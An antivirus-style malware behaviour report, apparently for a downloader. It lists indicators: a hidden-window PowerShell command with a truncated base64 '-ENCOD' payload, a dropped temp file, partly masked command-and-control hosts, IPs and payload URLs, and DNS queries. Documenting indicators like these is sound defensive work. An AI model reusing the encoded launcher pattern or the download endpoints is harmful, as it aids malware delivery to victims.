Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABHAGcAbQB5ADMAeAByAD0AKAAoACcASgAnACsAJwB1AHEAawAnACkAKwAoACcANwBoACcAKwAnAG8AJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAUwBlAHIAUA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1456
- %TEMP%\966566.cvr
- 'ma###sdc.com':80
- 'da####achines.com':80
- 'im#####tionquestion.com':80
- 'im#####tionquestion.com':443
- '12#.#17.44.59':80
- '3.##2.194.3':80
- '41.#9.94.30':80
- 'sr###aisw.org':80
- 'sr###aisw.org':443
- http://ma###sdc.com/MR/
- http://im#####tionquestion.com/3x_beast/Ty9/
- http://12#.#17.44.59/wordpress/gS/
- http://sr###aisw.org/manufacturer/h/
- 'im#####tionquestion.com':443
- 'sr###aisw.org':443
- DNS ASK ma###sdc.com
- DNS ASK da####achines.com
- DNS ASK im#####tionquestion.com
- DNS ASK sr###aisw.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABHAGcAbQB5ADMAeAByAD0AKAAoACcASgAnACsAJwB1AHEAawAnACkAKwAoACcANwBoACcAKwAnAG8AJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAUwBlAHIAUA... (со скрытым окном)